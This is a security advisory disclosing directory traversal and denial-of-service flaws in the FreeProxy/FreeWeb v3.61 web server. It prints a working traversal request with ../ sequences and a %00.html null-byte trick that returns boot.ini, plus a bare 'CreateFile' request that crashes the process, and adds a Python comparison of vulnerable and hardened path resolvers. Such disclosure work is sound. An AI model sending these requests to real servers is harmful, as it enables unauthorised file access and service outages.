The web server in FreeProxy v3.61 contains directory traversal and denial of service vulnerabilities.
SP Research Labs Advisory x08
-----------------------------
FreeProxy/FreeWeb v3.61 Multiple Vulnerabilities
------------------------------------------------
Vendor Home Page:
http://www.alphalink.com.au/~gregr/
Date Released - 1.8.2004
Downloads.com reported 105,607 downloads.
------------------------------------
Product Description from the vendor:
FreeProxy is professional Freeware which channels requests for internet pages via a single computer and enables many computers to share an internet connection. If you have dial-up internet access, you can use the Demand Dial or Auto-Dial feature to dial up the internet either when it detects you want to access the internet (demand) or maintain a strict schedule of connection times (auto). Works fast with Cable/Broadband.
--------------------
Directory Traversal:
A directory traversal vulnerability exists in the web server component of this product (FreeWeb), not in the proxy component. A request that climbs out of the document root with ../ sequences and ends in %00.html is served as-is. The trailing %00.html is the classic null-byte truncation trick: any check the server performs on the requested extension sees .html, while the file name is cut off at the null byte when Windows opens it, so the file actually returned is boot.ini.
Example:
--------
C:\>nc 192.168.1.100 80
GET /../../../../../../../boot.ini%00.html HTTP/1.0
HTTP/1.0 200 OK
Server: FreeProxy/3.61
Date: Fri, 09 Jan 2004 05:09:15 GMT
Content-Type: application/octet-stream
Last-Modified: Tue, 04 Nov 2003 16:55:36 GMT
Content-Length: 194
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect
------------------
Denial Of Service:
Sending an HTTP request whose request-target is the bare string 'CreateFile' (the name of the Win32 file-open API, with no leading slash) crashes the entire FreeProxy.exe process, so the proxy service goes down together with the web server.
Example:
--------
C:\>nc 192.168.1.100 80
GET CreateFile HTTP/1.0
**Application Crashes**
I get the following error message:
Unhandled exception in FreeProxy.exe: 0xC0000005: Access Violation.
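The two requests above, as an added example that is not part of this advisory and not FreeProxy's own code: a hypothetical file resolver with the defects the traversal exercises (raw ../ joined onto the document root, an extension check that is fooled by the null byte) next to a hardened one that rejects the null byte and the bare 'CreateFile' request-target, canonicalises the path and confirms it stays under the document root. The function names, the document root /var/www and the .html/.htm suffix policy are assumptions; the null-byte truncation of the Win32 open call is modelled explicitly because POSIX open() refuses names containing NUL.

```python
"""Added example, not FreeProxy's code: a naive request-path resolver with
the defects the advisory exercises, beside a hardened one.  Paths are
handled with posixpath so the example behaves the same on any platform."""
import posixpath
from urllib.parse import unquote

SERVED_SUFFIXES = (".html", ".htm")      # assumed suffix policy of the web server


def naive_resolve(docroot: str, request_target: str) -> str:
    """Vulnerable resolver (hypothetical).

    It decodes the target, checks the suffix on the decoded string, then joins
    the raw string onto the document root.  '../' is never collapsed, and the
    suffix check is fooled by '%00.html': the check sees '.html', but the OS
    open call (CreateFile on Windows) stops reading the name at the NUL byte.
    That truncation is modelled here because POSIX open() raises on embedded NUL.
    """
    decoded = unquote(request_target)
    if not decoded.endswith(SERVED_SUFFIXES):
        raise PermissionError("only %s are served" % ", ".join(SERVED_SUFFIXES))
    opened_name = decoded.split("\x00", 1)[0]          # what CreateFile would see
    return posixpath.normpath(posixpath.join(docroot, opened_name.lstrip("/")))


def safe_resolve(docroot: str, request_target: str) -> str:
    """Hardened resolver: validate the request-target, canonicalise, confirm
    containment, and apply the suffix policy to the canonical name."""
    if not request_target.startswith("/"):
        # An HTTP/1.0 origin-form request-target is an absolute path; the
        # advisory's crash request 'CreateFile' is refused before any file I/O.
        raise ValueError("request-target must start with '/'")
    decoded = unquote(request_target)
    if "\x00" in decoded:
        raise PermissionError("NUL byte in request path")
    root = posixpath.normpath(docroot)
    # Windows accepts backslash as a separator, so normalise it before '..' handling.
    relative = decoded.replace("\\", "/").lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if posixpath.commonpath([root, candidate]) != root:
        raise PermissionError("path escapes the document root")
    if not candidate.endswith(SERVED_SUFFIXES):
        raise PermissionError("only %s are served" % ", ".join(SERVED_SUFFIXES))
    return candidate


def outcome(resolver, docroot: str, request_target: str) -> str:
    """Return the resolved path, or the exception class name if the request is refused."""
    try:
        return resolver(docroot, request_target)
    except (PermissionError, ValueError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    DOCROOT = "/var/www"                                   # assumed document root
    PROBES = [                                             # the advisory's two requests plus a benign one
        "/../../../../../../../boot.ini%00.html",
        "CreateFile",
        "/index.html",
    ]
    for target in PROBES:
        print("%-42s naive=%-22s safe=%s" % (
            target,
            outcome(naive_resolve, DOCROOT, target),
            outcome(safe_resolve, DOCROOT, target)))
```

Run as a script, the naive resolver maps the advisory's traversal request to /boot.ini, outside the document root, while the hardened one refuses it on the NUL byte alone and would still refuse the same path without the NUL on the containment check; the bare 'CreateFile' target is rejected by the request-line check before any path handling.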
-----------------------
Tested on Windows XP SP1
Original Advisory:
http://www.security-protocols.com/modules.php?name=News&file=article&sid=1691&mode=&order=0&thold=0
Peace out,
------------------------------
badpack3t
www.security-protocols.com
------------------------------